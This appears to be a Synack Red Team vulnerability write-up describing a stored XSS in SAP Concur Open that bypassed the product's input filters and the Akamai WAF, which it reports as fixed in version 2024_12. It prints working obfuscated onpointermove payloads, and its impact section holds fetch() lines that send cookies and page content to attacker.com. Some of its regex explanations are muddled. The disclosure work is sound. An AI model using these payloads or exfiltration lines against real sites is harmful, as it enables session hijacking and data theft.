The Layers of Defense Targeted:

1. SAP Concur Open’s Input Validations: Strong in-place filters designed to block any quotes, HTML tags and event handlers.
2. Akamai Web Application Firewall (WAF): A robust perimeter defense solution integrated with SAP Concur to detect and block injection attacks.

The Exploit and Its Techniques:

The attack demonstrates how modern XSS payloads evade both application-level filters and WAF defenses through:

• HTML Comment Injection: Obscuring payload patterns to bypass regex-based filters.
• Event Handler Obfuscation: Using less common event triggers to evade WAF detection.
• Akamai WAF Bypass Techniques: Employing payload fragmentation and signature evasion to circumvent WAF defenses.
• Regex Evasion (?<!><!–>): Exploiting weaknesses in input validation patterns through lookbehind assertions and payload splitting.

Scope of This Post:

This blog post will:

• Provide insights into SAP Concur Open’s filtering mechanisms and Akamai WAF defenses.
• Walk through the bypass of input validation and WAF protections step-by-step, supported by POC screenshots.
• Analyze the XSS payload and explain the filter evasion techniques.
• Present recommendations for fixing the vulnerabilities.
• Evaluate how the SAP Concur 2024_12 update addresses the identified issues.

This post offers a deep dive into modern XSS exploitation techniques and highlights the importance of multi-layered security defenses to protect against evolving threats. These techniques, often overlooked by developers and security controls, allowed me to achieve persistent XSS execution within the platform.

About SAP Concur Open:

SAP Concur Open is the API-driven extension of SAP Concur, providing enterprises with advanced expense and travel management capabilities. It can be used to define corporate travel policies and classes; streamline expense report approvals and audits; configure policies using Concur APIs; and connect with enterprise resource planning (ERP) systems, travel agencies and other third-party services.

Security Layers in SAP Concur Open:

1. In-Place Input Validation by SAP Concur:

• HTML Filtering: blocks and throws error on common HTML tags such as <h1>, <img>, <iframe>.
• Event Handler Blocking: Removes onload, onclick, onerror.
• Quote Blocking: Blocks any single quotes (‘) and double quotes (“) from inputs.
• Encoding Blocking: Rejects payloads using HTML entity encoding (e.g., &lt;, &gt;) and URL encoding (e.g., %3Cs%3E).
• Regex-Based Input Validation: Matches known patterns but fails against obfuscated payloads.
• No Immediate Reflection: Outputs are escaped, preventing standard payloads from rendering.

2. Akamai WAF:

• Signature-Based Detection: Blocks known XSS payloads.
• Anomaly Detection: Identifies suspicious input behavior.
• Rate Limiting: Reduces brute-force attempts on input fields.

Initial Challenge – Bypassing SAP Concur Input Validations

Attempt 1: Injecting a Standard HTML Payload – Blocked by Concur Filters

Payloads: “><h1>Test</h1> ,”, ‘, `

• Result: Blocked. No reflection on the page.
• Server Response: 500 Error – Input Rejected by Concur’s Validation Filters.

Why ?<!><!–><h2 onpointermove=con.(1)>Clickme Bypassed SAP Concur Input Validation

The payload:

?<!><!–><h2 onpointermove=con.(1)>Clickme

successfully bypassed SAP Concur’s input validation due to a combination of obfuscation techniques and exploitation of overlooked event handlers. Here’s how:

1. HTML Comment Injection (?<!><!–>) – Regex Evasion

• The ?<!><!–> sequence injects an HTML comment and a negative lookbehind assertion.
• Effect on Regex Filters: 
  • SAP Concur’s filters use regex-based input validation, typically matching patterns like <[a-z]+.*on[a-z]+=.*> to block event handlers.
  • The HTML comment (<!–>) breaks the regex continuity, causing the filter to fail to recognize the malicious event handler.
  • The lookbehind assertion (?<!>) is a regex technique often unsupported or misinterpreted, which contributes to the bypass.

2. Obscure Event Handler (onpointermove) – WAF and Filter Bypass

• SAP Concur’s input validation explicitly blocks common event handlers (onload, onclick, onerror) but ignores obscure events.
• onpointermove is a less common event that triggers when the mouse pointer moves over the element.
• Effect: The payload bypassed event-based filtering because SAP Concur’s filter was event-specific, failing to detect onpointermove.

3. Lack of Comprehensive Event Blocking

• SAP Concur applies event blocking based on a blacklist approach, targeting only high-risk events like onload or onerror.
• No generic pattern detection for on[a-z]+ events, allowing uncommon events such as onpointermove to slip through.

4. Output Reflection and Execution

• The input was stored in the database and rendered without output encoding, causing the <h2> tag and its event to execute directly in the browser.
• Content Security Policy (CSP) was applied to block the inline script execution. But was not actually working in place.

Challenge Insight – SAP Concur Input Validations:

✅ Blocks standard HTML TAG, QUOTES, Special Characters, payloads (‘, “, <a>, <img>)
✅ Removes high-profile event handlers (onload, onerror, onclick)
✅ Escapes direct output to prevent reflection
⚠️ Fails against obfuscated payloads with HTML comments and uncommon event handlers

Let’s Bypass Akamai WAF with Payload Obfuscation

First WAF Attempts – Detected and Blocked:

During initial tests, the Akamai WAF effectively blocked standard XSS payloads through signature-based detection and event handler filtering:

• Basic URL Encoding: Payloads using URL encoding, such as %3F%3C!%3E%3C!–%3E%3Ch2%20onpointermove%3Dconsole.log(document.domain)%3EClickme, were detected and blocked.
• Known XSS Signatures: Payloads with recognized patterns, such as ad?<!><!–><h2 onpointermove=console.log(document.domain)>Clickme, were identified and blocked.

Final WAF Bypass Technique: Obscure Event Handler + HTML Comment Injection

Injected Payload:

?<!><!–><h2 onpointermove=console.warn(domain)>Clickme

Why It Bypassed Akamai WAF:

1. HTML Comment Injection (?<!><!–>) – Regex Evasion:
   • The ?<!><!–> sequence uses a negative lookbehind assertion and HTML comment injection to split the payload, breaking the WAF signature detection.
   • Confuses regex filters designed to block continuous patterns like <on[a-z]*=.
2. Uncommon Event Handler (onpointermove) – Event-Based Bypass:
   • onpointermove is an obscure event that triggers when the user moves the mouse over an element.
   • It bypasses WAF rules, which typically focus on blocking common events (onload, onerror).
3. JavaScript Execution (console.warn(domain)) – Verification:
   • Executes in the victim’s browser and outputs the domain to the browser console, confirming XSS.

 WAF Reaction:

✅ No Signature Detection: Passed due to payload splitting (<!–>), Inline Execution: WAF missed onpointermove. Stored Successfully: Payload was saved in the database. PoC below,

Exploiting the Stored XSS – Payload Trigger in Victim’s Browser

Outcome:

💻 Console Output:

console.warn(domain)

Displayed the current domain in the browser console, confirming XSS.

Impact Analysis:

Session Hijacking:
Capture and exfiltrate admin session cookies:

fetch(‘https://attacker.com/log?cookie=’+document.cookie);

Data Exfiltration:
Send sensitive data to an attacker-controlled server:

fetch(‘https://attacker.com/collect’,{method:’POST’,body:document.body.innerHTML});

Policy Manipulation:
Modify travel policies or add unauthorized travel classes via stored scripts.

Insights from a Red Team Perspective

1. Bypassing In-Place Validations with Obfuscation:

• Obscure Event Handlers (onpointermove, ontoggle) are often ignored by filters.
• Comment Injection (<!–>) is a simple yet effective bypass technique.
• Payload splitting techniques (?<!>) evade regex-based filters.

2. Defeating WAF Controls with Pattern Evasion:

• Signature-based WAFs fail against payload fragmentation (<!–>).
• Anomaly detection models miss uncommon user behaviors like onpointermove.

3. The Importance of Layered Security:

• Input sanitization alone is insufficient.
• Content Security Policies (CSPs) are crucial to prevent inline script execution.
• WAF rules must evolve to detect obscure event handlers and HTML comment injections.

Conclusion:

This exploit of SAP Concur Open highlights the evolving sophistication of modern XSS payloads. Key takeaways include:

The vulnerability was fixed in SAP Concur Open version 2024_12, which introduced the following security enhancements:

• ✅ Enhanced Input Validation: Blocks all on* event handlers, including onpointermove, and strips HTML comments to prevent regex evasion.
• ✅ Improved WAF Rules (Akamai): Added deep packet inspection (DPI) and blocked obfuscated payload patterns (?<!><!–>).
• ✅ Output Encoding: Applied strict HTML entity encoding to prevent stored XSS execution.
• ✅ CSP Implementation: Introduced a strong Content Security Policy to prevent inline script execution.

SAP Concur Open version 2024_12 is confirmed to address all bypass techniques discussed.

Be sure to follow Synack and the Synack Red Team on LinkedIn for later additions to this series.